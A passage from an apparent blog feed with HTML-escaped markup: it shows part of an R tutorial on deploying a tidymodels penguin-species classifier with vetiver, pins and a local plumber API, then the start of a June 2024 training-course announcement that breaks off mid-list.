&lt;p&gt;&lt;strong&gt;Moving to packages:&lt;/strong&gt; As your analysis matures, consider creating an R
package to encourage proper documentation, testing, and dependency
management.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tidying &amp;amp; cleaning:&lt;/strong&gt; With your code in a package and tests in place,
optimise bottlenecks to improve efficiency.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Versioning data:&lt;/strong&gt; Ensure reproducibility by including timestamps in
your database queries or otherwise ensuring you can retrieve the same
dataset in the future.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-mlops-tidymodels-deployment"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="modelling"&gt;Modelling&lt;/h2&gt;
&lt;p&gt;This post isn’t focused on modeling frameworks, so we’ll use
&lt;a href="https://www.tidymodels.org/" rel="external"&gt;{tidymodels}&lt;/a&gt; and the &lt;a href="https://allisonhorst.github.io/palmerpenguins/" rel="external"&gt;{palmerpenguins}&lt;/a&gt; dataset for brevity.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Remove missing values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(penguins, flipper_length_mm)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We aim to predict penguin species using island, flipper_length_mm, and
body_mass_g. A scatter plot indicates this should be feasible.
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/./scatter-plot-1.svg" alt="Plot of Body mass (g) vs flipper length (mm). The species of penguin is shown by the colour and the island is shown by the shape. There is a visible split between the Gentoo penguins and the others, with gentoo being overall larger in both ways." width="666.666666666667" style="display: block; margin: auto;" /&gt;
The scatter plot points to an obvious separation of Gentoo, to the other
species. But pulling apart Adelie / Chinstrap looks a little more
tricky.&lt;/p&gt;
&lt;p&gt;Modelling wise, we’ll again keep things simple - a straight forward
nearest neighbour model, where we use the island, flipper length and
body mass to predict species type:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recipe&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; island &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; flipper_length_mm &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; body_mass_g,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;workflow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nearest_neighbor&lt;/span&gt;(mode &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;classification&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fit&lt;/span&gt;(penguins_data)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The model object can now be used to predict species. Reusing the same
data as before, we have an accuracy of around 95%.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_pred &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(model, penguins_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(model_pred&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;.pred_class &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.character&lt;/span&gt;(penguins_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;species))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 0.9474&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="vetiver-model"&gt;Vetiver Model&lt;/h2&gt;
&lt;p&gt;Now that we have a model, we can start with MLOps and &lt;a href="https://rstudio.github.io/vetiver-r/" rel="external"&gt;{vetiver}&lt;/a&gt;. First,
collate all the necessary information to store, deploy, and version the
model.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_model&lt;/span&gt;(model,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; description &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blog-test&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ── k-nn ─ &amp;lt;bundled_workflow&amp;gt; model for deployment &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; blog-test using 3 features&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;v_model&lt;/code&gt; object is a list with six elements, including our
description.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(v_model)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;model&amp;#34; &amp;#34;model_name&amp;#34; &amp;#34;description&amp;#34; &amp;#34;metadata&amp;#34; &amp;#34;prototype&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [6] &amp;#34;versioned&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;description
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;blog-test&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;metadata&lt;/code&gt; contains various model-related components.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;metadata
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; list()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $required_pkgs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;kknn&amp;#34; &amp;#34;parsnip&amp;#34; &amp;#34;recipes&amp;#34; &amp;#34;workflows&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;!-- ## Pinning metrics as meta data --&gt;
&lt;!-- https://posit-conf-2023.github.io/vetiver/slides/03-deploy.html#/model-metrics-as-metadata-4 --&gt;
&lt;h3 id="storing-your-model"&gt;Storing your Model&lt;/h3&gt;
&lt;p&gt;To deploy a {vetiver} model object, we use a pin from the &lt;a href="https://pins.rstudio.com/" rel="external"&gt;{pins}&lt;/a&gt;
package. A pin is simply an R (or Python!) object that is stored for
reuse at a later date. The most common use case of the {pins} package
(at least for me) is for caching data for a shiny application or quarto
document. Basically an easy way to &lt;a href="https://www.youtube.com/watch?v=P4F35qieIhQ" rel="external"&gt;cache
data&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, we can pin &lt;strong&gt;any&lt;/strong&gt; R object - including a pre-built model. We
pin objects to “boards” - boards can exist in many places, including
Azure, Google drive, or a simple s3 bucket. For this example, I’m using
using Posit Connect:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_write&lt;/span&gt;(board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), v_model)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To retrieve the object, use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Not something you would normally do with a {vetiver} model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_read&lt;/span&gt;(pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; bundled workflow object.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $prototype&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 0 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 3 variables: island &amp;lt;fct&amp;gt;, flipper_length_mm &amp;lt;int&amp;gt;, body_mass_g &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="deploying-as-an-api"&gt;Deploying as an API&lt;/h3&gt;
&lt;p&gt;The final step is to construct an API around your stored model. This is
achieved using the {plumber} package. To deploy locally, i.e. on your
own computer, we create a plumber instance and pass the model using
{vetiver}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_api&lt;/span&gt;(v_model) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This deploys the APIs locally. When you run the code, a browser window
will likely open. If it doesn’t simply navigate to
&lt;code&gt;http://127.0.0.1:7764/__docs__/&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If the API has successfully deployed, then&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;127.0.0.1:7764/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(base_url, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ping&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metadata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;content&lt;/span&gt;(r, as &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, encoding &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;UTF-8&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(metadata)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;should return&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$status&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;online&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;2024-05-27 17:15:39&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The API also has endpoints &lt;code&gt;metadata&lt;/code&gt; and &lt;code&gt;pin-url&lt;/code&gt; allowing you to
programmatically query the model. The key endpoint for MLops, is
&lt;code&gt;predict&lt;/code&gt;. This endpoint allows you to pass new data to your model, and
predict the outcome&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(base_url, &lt;span style="color:#a5d6ff"&gt;&amp;#34;predict&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;endpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_endpoint&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pred_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;island&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;flipper_length_mm&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;body_mass_g&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice_sample&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(endpoint, pred_data)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;This post introduces MLOps and its applications. In the next post, we’ll
discuss deploying models in production.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>June 2024 Training Update</title><link>https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/</link><pubDate>Thu, 06 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our courses for the second half of 2024 have now been released. We have everything from the very basics of R and Python for data science, to advanced statistical modelling and machine learning. Interested in dashboards and reporting? We have courses on reporting with Quarto, as well as both introductory and advanced Shiny. Already know the basics but want to hone your skills? We have plenty of intermediate courses for you, as well as a course to take a look at some best practices in R and Python.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-june-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 3rd July, 7th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In this course you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July, 21st October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 10th July, 16th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. This course will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
